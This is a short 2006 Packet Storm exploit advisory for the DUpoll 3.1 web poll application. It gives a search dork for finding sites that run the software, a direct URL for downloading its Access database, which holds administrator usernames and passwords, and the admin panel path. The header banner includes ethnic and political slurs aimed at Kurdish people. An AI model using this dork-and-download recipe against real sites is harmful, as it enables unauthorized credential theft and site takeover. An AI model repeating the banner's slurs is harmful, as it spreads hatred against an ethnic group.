dupoll31.txt

2006-08-30T00:00:00
ID PACKETSTORM:49554
Type packetstorm
Reporter BoZKuRTSeRDaR
Modified 2006-08-30T00:00:00

Description

                                        
                                            `#############################################################################  
#DUpoll 3.1 application bug #  
# #  
#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet korsanı #  
# #  
#kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz #  
# #  
#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com #  
# #   
# #  
#############################################################################  
  
Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/  
  
Dork/Search for: "Powered by DUpoll"  
  
Exploit :  
  
http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb  
  
database downloading  
  
database users table administratory users and pasword  
  
go dir   
  
http://www.target.com/[DUpollpatch]/admin/default.asp   
  
Security Adivisory | Edithor by BoZKuRTSeRDaR   
`